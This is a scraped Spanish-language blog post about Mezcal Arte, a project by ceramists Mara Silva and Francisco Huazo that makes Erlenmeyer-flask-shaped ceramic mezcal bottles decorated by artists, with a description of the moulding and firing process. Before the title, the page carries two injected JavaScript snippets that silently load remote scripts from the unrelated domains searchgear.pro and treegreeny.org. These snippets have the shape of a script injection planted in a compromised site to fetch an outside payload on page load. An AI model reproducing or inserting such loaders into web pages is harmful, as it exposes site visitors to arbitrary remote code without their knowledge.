;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 165. Cerámica, matraces y mezcal

165. Cerámica, matraces y mezcal


Botella decorada por Luis Argudín

Mezcal Arte es un proyecto coordinado por los ceramistas y artistas plásticos Mara Silva y Francisco Huazo que busca sumar “diversas áreas de la cultura de México como la gastronomía, el arte visual y plástico de gran carácter y oficio, y la cerámica: actividad artesanal de profundas raíces y que ahora se reinventa mostrando fortaleza y vigor.” Su propuesta la concretaron en la elaboración de una botella de cerámica para mezcal con la clásica forma de matraz Erlenmeyer, instrumento inventado en 1861 por el químico Richard August Carl Emil Erlenmeyer. Atinada elección, pues la química remite a la alquimia, a la esencia, tal como el mezcal tradicional resulta ser la esencia del maguey, de una región, de su tradición, de su cultura y de su espíritu. Las botellas están decoradas por distintos artistas, entre ellos Luis Argudín, Gustavo Monroy, Pablo Rámirez, Manuel Marín, Betzabee Romero y los coordinadores.

Cada botella -dicen Silva y Huazo- “se  elabora por medio de vaciado en moldes de yeso y se utilizan fórmulas propias resultado de investigaciones generadas en el taller. Ya que las piezas se desmoldan, se dejan secar para pulirlas y meterlas a una primera quema que se le llama sancocho a 1030°, lo que se hace para endurecer el cuerpo de la pieza, poder manipularla, decorarla y finalmente esmaltarla. Ya sancochada, se pule de nuevo para preparar la superficie, se quita el exceso de polvo y se decora con distintas técnicas, tales como engobes, pinturas a base de pigmentos cerámicos, óxidos colorantes y un grafito cerámico con calidades muy similares al lápiz sobre papel; aquí cada artista elige la técnica con la que quiera trabajar. Decoradas las piezas, son esmaltadas con esmalte transparente-brillante de alta resistencia y se vuelven a hornear a 1050°; cada quema dura entre 10 y 14 horas y el enfriamiento para sacarlas del horno entre 15 y 20 horas.”

Para ver las botellas, visite www.mezcalestradicionales.mx. Para adquirirlas, escriba a centrodeinvestigacion5@yahoo.com.mx.

http://www.milenio.com/cdb/doc/impreso/9171999

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *